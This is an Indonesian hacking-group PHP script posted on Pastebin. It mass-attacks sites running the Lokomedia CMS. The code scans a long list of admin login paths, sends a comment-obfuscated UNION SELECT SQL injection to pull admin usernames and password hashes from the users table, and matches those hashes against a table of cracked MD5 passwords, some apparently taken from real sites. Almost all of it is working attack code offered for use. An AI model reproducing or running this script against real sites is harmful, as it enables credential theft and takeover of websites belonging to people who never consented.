API tools faq
paste
Guest User

Untitled

a guest
Mar 18th, 2017
60
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 11.93 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2. set_time_limit(0);
  3. error_reporting(0);
  4. // Lokomedia (SQL Injection) + Auto Scan Admin Login
  5. // enjoyyyy
  6. // Coded by Mr. Error 404 (l0c4lh34rtz) - IndoXploit - Sanjungan Jiwa
  7. // greetz: res7ock crew - j*ncok Sec
  8.  
  9. //HARAP TIDAK MENGGANTI COPYRIGHT JIKA KALIAN INGIN DIHARGAI ^^
  10.  
  11. function cover() {
  12. echo "[ =========================================================================== ]<br>";
  13. echo " --> Lokomedia (SQL Injection) + Auto Scan Admin Login <--<br>";
  14. echo " ## Coded by Mr. Error 404 (l0c4lh34rtz) - IndoXploit - Sanjungan Jiwa ##<br>";
  15. echo " # greetz: res7ock crew - j*ncok Sec #<br>";
  16. echo "[ =========================================================================== ]<br><br>";
  17. }
  18.  
  19. ?>
  20. <html>
  21. <head>
  22. <style type="text/css">
  23. textarea {
  24. width: 500px;
  25. height: 200px;
  26. border: 1px solid #000000;
  27. margin: 5px auto;
  28. padding: 7px;
  29. }
  30. input[type=submit] {
  31. width: 500px;
  32. height: 25px;
  33. border: 1px solid #000000;
  34. background: transparent;
  35. margin: 5px auto;
  36. background: #000000;
  37. color: #ffffff;
  38. cursor: pointer;
  39. }
  40. </style>
  41. </head>
  42. <center>
  43. <?php cover(); ?>
  44. <form method="post">
  45. <textarea name="target" placeholder="http://www.target.com/" style="width: 500px; height: 250px;" required></textarea><br>
  46. <input type="submit" name="go" value="Xploit" style="width: 500px;">
  47. </form>
  48. </center>
  49. <?php
  50. function ngcurl($url) {
  51. $curl = curl_init($url);
  52. curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
  53. curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
  54. $content = curl_exec($curl);
  55. curl_close($curl);
  56. return $content;
  57. }
  58. $admin = array(
  59. 'adm/',
  60. '_adm_/',
  61. '_admin_/',
  62. '_administrator_/',
  63. 'operator/',
  64. 'sika/',
  65. 'develop/',
  66. 'ketua/',
  67. 'redaktur/',
  68. 'author',
  69. 'admin/',
  70. 'administrator/',
  71. 'adminweb/',
  72. 'user/',
  73. 'users/',
  74. 'dinkesadmin/',
  75. 'retel/',
  76. 'author/',
  77. 'panel/',
  78. 'paneladmin/',
  79. 'panellogin/',
  80. 'redaksi/',
  81. 'cp-admin/',
  82. 'master/',
  83. 'master/index.php',
  84. 'master/login.php',
  85. 'operator/index.php',
  86. 'sika/index.php',
  87. 'develop/index.php',
  88. 'ketua/index.php',
  89. 'redaktur/index.php',
  90. 'admin/index.php',
  91. 'administrator/index.php',
  92. 'adminweb/index.php',
  93. 'user/index.php',
  94. 'users/index.php',
  95. 'dinkesadmin/index.php',
  96. 'retel/index.php',
  97. 'author/index.php',
  98. 'panel/index.php',
  99. 'paneladmin/index.php',
  100. 'panellogin/index.php',
  101. 'redaksi/index.php',
  102. 'cp-admin/index.php',
  103. 'operator/login.php',
  104. 'sika/login.php',
  105. 'develop/login.php',
  106. 'ketua/login.php',
  107. 'redaktur/login.php',
  108. 'admin/login.php',
  109. 'administrator/login.php',
  110. 'adminweb/login.php',
  111. 'user/login.php',
  112. 'users/login.php',
  113. 'dinkesadmin/login.php',
  114. 'retel/login.php',
  115. 'author/login.php',
  116. 'panel/login.php',
  117. 'paneladmin/login.php',
  118. 'panellogin/login.php',
  119. 'redaksi/login.php',
  120. 'cp-admin/login.php',
  121. 'terasadmin/',
  122. 'terasadmin/index.php',
  123. 'terasadmin/login.php',
  124. 'rahasia/',
  125. 'rahasia/index.php',
  126. 'rahasia/admin.php',
  127. 'rahasia/login.php',
  128. 'dinkesadmin/',
  129. 'dinkesadmin/login.php',
  130. 'adminpmb/',
  131. 'adminpmb/index.php',
  132. 'adminpmb/login.php',
  133. 'system/',
  134. 'system/index.php',
  135. 'system/login.php',
  136. 'webadmin/',
  137. 'webadmin/index.php',
  138. 'webadmin/login.php',
  139. 'wpanel/',
  140. 'wpanel/index.php',
  141. 'wpanel/login.php',
  142. 'adminpanel/index.php',
  143. 'adminpanel/',
  144. 'adminpanel/login.php',
  145. 'adminkec/',
  146. 'adminkec/index.php',
  147. 'adminkec/login.php',
  148. 'admindesa/',
  149. 'admindesa/index.php',
  150. 'admindesa/login.php',
  151. 'adminkota/',
  152. 'adminkota/index.php',
  153. 'adminkota/login.php',
  154. 'admin123/',
  155. 'admin123/index.php',
  156. 'admin123/login.php',
  157. 'logout/',
  158. 'logout/index.php',
  159. 'logout/login.php',
  160. 'logout/admin.php',
  161. 'adminweb_setting',
  162. );
  163. $real_pass = array(
  164. "a66abb5684c45962d887564f08346e8d" => "admin123456",
  165. "99026ab4ab3de96f3d7ae33c8c85057b" => "master!@#$qwe",
  166. "c630643500720b255abb22e2ab2c31f6" => "sumedang123",
  167. "1c63129ae9db9c60c3e8aa94d3e00495" => "1qaz2wsx",
  168. "f243df64be7184fb0fc07bd6cf53185b" => "b1smillah",
  169. "93261ae77f0df5522dd9767203f3aa17" => "house69",
  170. "f243df64be7184fb0fc07bd6cf53185b" => "b1smillah",
  171. "37c77ada62ec68d1b740717fc886bef6" => "Suk4bum1",
  172. "d39b59b946b414c4e5926f9c7b23840a" => "kasitaugakya",
  173. "fbff29af096fa646757ce8439b644714" => "vro190588",
  174. "1feadc10e93f2b64c65868132f1e72d3" => "agoes",
  175. "0192023a7bbd73250516f069df18b500" => "admin123",
  176. "7aa1dfee8619ac8f282e296d83eb55ff" => "meong",
  177. "24fa5ee2c1285e115dd6b5fe1c25a333" => "773062",
  178. "d557fd4686821b5d8b927cdfe6e67d21" => "#admin#",
  179. "5fec4ba8376f207d1ff2f0cac0882b01" => "admin!@#",
  180. "a01726b559eeeb5fc287bf0098a22f6c" => "@dm1n",
  181. "73acd9a5972130b75066c82595a1fae3" => "ADMIN",
  182. "511f2efed0e465e700a951f2f1ecec19" => "bs1unt46",
  183. "7b7bc2512ee1fedcd76bdc68926d4f7b" => "Administrator",
  184. "99fedb09f0f5da90e577784e5f9fdc23" => "ADMINISTRATOR",
  185. "e58bfd635502ea963e1d52487ac2edfa" => "!@#123!@#123",
  186. "5449ccea16d1cc73990727cd835e45b5" => "ngadimin",
  187. "c21f969b5f03d33d43e04f8f136e7682" => "default",
  188. "1a1dc91c907325c69271ddf0c944bc72" => "pass",
  189. "fffdf0489f264598e9d35cba0381e9ac" => "sukmapts",
  190. "5f4dcc3b5aa765d61d8327deb882cf99" => "password",
  191. "5ebe2294ecd0e0f08eab7690d2a6ee69" => "secret",
  192. "c893bad68927b457dbed39460e6afd62" => "prueba",
  193. "b2ca9cfa6067282a031d28a54886822d" => "admin4343",
  194. "3a3795bb61d5377545b4f345ff223e3d" => "bingo",
  195. "e172dd95f4feb21412a692e73929961e" => "bismillah",
  196. "8221303fbf816fd9da96be7dd4c92f99" => "salawarhandap123",
  197. "0570e3795fbe97ddd3ce53be141d1aed" => "indoxploit",
  198. "098f6bcd4621d373cade4e832627b4f6" => "test",
  199. "976adc43eaf39b180d9f2c624a1712cd" => "adminppcp",
  200. "5985609a2dc01098797c94a43e0a1115" => "masarief",
  201. "21232f297a57a5a743894a0e4a801fc3" => "admin",
  202. "1870a829d9bc69abf500eca6f00241fe" => "wordpress",
  203. "126ac9f6149081eb0e97c2e939eaad52" => "blog",
  204. "fe01ce2a7fbac8fafaed7c982a04e229" => "demo",
  205. "04e484000489dd3b3fb25f9aa65305c6" => "redaksi2016",
  206. "91f5167c34c400758115c2a6826ec2e3" => "administrador",
  207. "200ceb26807d6bf99fd6f4f0d1ca54d4" => "administrator",
  208. "c93ccd78b2076528346216b3b2f701e6" => "admin1234",
  209. "912ec803b2ce49e4a541068d495ab570" => "asdf",
  210. "1adbb3178591fd5bb0c248518f39bf6d" => "asdf1234",
  211. "e99a18c428cb38d5f260853678922e03" => "abc123",
  212. "a152e841783914146e4bcd4f39100686" => "asdfgh",
  213. "a384b6463fc216a5f8ecb6670f86456a" => "qwert",
  214. "d8578edf8458ce06fbc5bb76a58c5ca4" => "qwerty",
  215. "b59c67bf196a4758191e42f76670ceba" => "1111",
  216. "96e79218965eb72c92a549dd5a330112" => "111111",
  217. "4297f44b13955235245b2497399d7a93" => "123123",
  218. "c33367701511b4f6020ec61ded352059" => "654321",
  219. "81dc9bdb52d04dc20036dbd8313ed055" => "1234",
  220. "e10adc3949ba59abbe56e057f20f883e" => "123456",
  221. "fcea920f7412b5da7be0cf42b8c93759" => "1234567",
  222. "25d55ad283aa400af464c76d713c07ad" => "12345678",
  223. "25f9e794323b453885f5181f1b624d0b" => "123456789",
  224. "e807f1fcf82d132f9bb018ca6738a19f" => "1234567890",
  225. "befe9f8a14346e3e52c762f333395796" => "qawsed",
  226. "76419c58730d9f35de7ac538c2fd6737" => "qazwsx",
  227. "5f4dcc3b5aa765d61d8327deb882cf99" => "password",
  228. "bed128365216c019988915ed3add75fb" => "passw0rd",
  229. "21232f297a57a5a743894a0e4a801fc3" => "admin",
  230. "e10adc3949ba59abbe56e057f20f883e" => "123456",
  231. "5f4dcc3b5aa765d61d8327deb882cf99" => "password",
  232. "25d55ad283aa400af464c76d713c07ad" => "12345678",
  233. "f379eaf3c831b04de153469d1bec345e" => "666666",
  234. "96e79218965eb72c92a549dd5a330112" => "111111",
  235. "fcea920f7412b5da7be0cf42b8c93759" => "1234567",
  236. "d8578edf8458ce06fbc5bb76a58c5ca4" => "qwerty",
  237. "6f3cac6213ffceee27cc85414f458caa" => "siteadmin",
  238. "200ceb26807d6bf99fd6f4f0d1ca54d4" => "administrator",
  239. "63a9f0ea7bb98050796b649e85481845" => "root",
  240. "4297f44b13955235245b2497399d7a93" => "123123",
  241. "c8837b23ff8aaa8a2dde915473ce0991" => "123321",
  242. "e807f1fcf82d132f9bb018ca6738a19f" => "1234567890",
  243. "4ca7c5c27c2314eecc71f67501abb724" => "letmein123",
  244. "cc03e747a6afbbcbf8be7668acfebee5" => "test123",
  245. "62cc2d8b4bf2d8728120d052163a77df" => "demo123",
  246. "32250170a0dca92d53ec9624f336ca24" => "pass123",
  247. "46f94c8de14fb36680850768ff1b7f2a" => "123qwe",
  248. "200820e3227815ed1756a6b531e7e0d2" => "qwe123",
  249. "c33367701511b4f6020ec61ded352059" => "654321",
  250. "f74a10e1d6b2f32a47b8bcb53dac5345" => "loveyou",
  251. "172eee54aa664e9dd0536b063796e54e" => "adminadmin123",
  252. "e924e336dcc4126334c852eb8fadd334" => "waskita1234",
  253. "02631cc1d0cc5bda188566e90d0ae16c" => "rsamku2013",
  254. "b69cbef044eac6fc514a2988e62c5b30" => "unlock08804",
  255. "12e110a1b89da9b09a191f1f9b0a1398" => "nalaratih",
  256. "f70d32432ff0a8984b5aadeb159f9db6" => "Much240316",
  257. "a2fffa77aa0dde8cd4c416b5114eba21" => "gondola",
  258. "2b45af95ce316ea4cffd2ce4093a2b83" => "w4nd3szaki",
  259. "c5612a125d8613ddae79a6b36c8bee37" => "Reddevil#21",
  260. "6e7fbe8e6147e2c430ce7e8ab883e533" => "R4nd0m?!",
  261. "5136850b6c8f3ebc66122188347efda0" => "adminku",
  262. "5214905fbe8d7f0bb0d0a328f08af3f0" => "adminpust4k4",
  263. "acfc976c2d22e4a595a9ee6fc0d05f27" => "dikmen2016",
  264. "dcdee606657b5f7d8b218badfeb22a90" => "masputradmin",
  265. "ecb4208ee41389259a632d3a733c2786" => "741908",
  266. "827ccb0eea8a706c4c34a16891f84e7b" => "12345",
  267. "855be097acdf2fea4e342615a154ca3c" => "tolol",
  268. "eeee80342778e7b497d507f89094b10d" => "master10",
  269. "d29c0398602e6cf005f0dcb7a0443c7d" => "adminjalan",
  270. "9062756924cf10763cc89cf2793a77ab" => "pass4@nd1",
  271. "8b6bc5d8046c8466359d3ac43ce362ab" => "ganteng",
  272. "528d06a172eb2d8fab4e93f33f3986a8" => "jasindolive",
  273. "058fe7f85df1e992ef7bf948f1db7842" => "404J",
  274. "abe1f4492f922a9111317ed7f7f8e723" => "bantarjati5",
  275. );
  276. $sites = explode("\r\n", htmlspecialchars($_POST['target']));
  277. if(isset($_POST['go'])) {
  278. foreach($sites as $url) {
  279. if(!preg_match("/^http:\/\//", $url) AND !preg_match("/^https:\/\//", $url)) {
  280. $url = "http://$url";
  281. } else {
  282. $url = $url;
  283. }
  284. $statis = "";
  285. $sisa = "";
  286. $login = "";
  287. $param_list = array("statis","kategori","berita");
  288. $curl = ngcurl($url);
  289. $curl = str_replace("'", '"', $curl);
  290. foreach($param_list as $param) {
  291. preg_match_all("/$param-(.*?)\">/", $curl, $id);
  292. foreach($id[1] as $stat) {
  293. $pecah = explode("-", $stat);
  294. $statis .= $pecah[0];
  295. $sisa .= $pecah[1];
  296. break;
  297. }
  298. foreach($admin as $adminweb) {
  299. $curl_admin = ngcurl("$url/$adminweb");
  300. if(preg_match("/administrator|username|password/i", $curl_admin) AND !preg_match("/not found|forbidden|404|403|500/i", $curl_admin)) {
  301. $login .= "$url/$adminweb";
  302. break;
  303. }
  304. }
  305. $sql = ngcurl("$url/$param-$statis'/*!50000UniON*/+/*!50000SeLeCT*/+/*!50000cOnCAt*/(0x696e646f78706c6f6974,0x3c6c693e,username,0x20,password,0x3c6c693e)+from+users--+---+-$sisa");
  306. preg_match("/<meta name=\"description\" content=\"(.*?)\">/", $sql, $up);
  307. preg_match("/<li>(.*)<li>/", $up[1], $akun);
  308. $data = explode(" ", $akun[1]);
  309. echo "[+] URL: $url\n";
  310. //echo "[+] param: $param\n";
  311. if(htmlspecialchars($curl) !== htmlspecialchars($sql)) {
  312. if(preg_match("/indoxploit/", $sql)) {
  313. //echo "[ Injection Successfully ]\n";
  314. if($data[0] == "" || $data[1] == "") {
  315. echo "[+] Not Injected :(\n\n";
  316. break;
  317. } else {
  318. echo "[+] username: ".$data[0]."\n";
  319. $passwd = $real_pass[$data[1]];
  320. if($passwd == "") {
  321. $passwd = $data[1];
  322. simpen($data[1]);
  323. }
  324. echo "[+] password: $passwd\n";
  325. }
  326. if($login == "") {
  327. echo "[+] Login Admin ga ketemu :(\n\n";
  328. } else {
  329. echo "[+] Login: $login\n\n";
  330. }
  331. break;
  332. } else {
  333. echo "[+] Not Injected :(\n\n";
  334. break;
  335. }
  336. } else {
  337. echo "[+] Not Injected :(\n\n";
  338. break;
  339. }
  340. }
  341. }
  342. }
  343. ?>
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!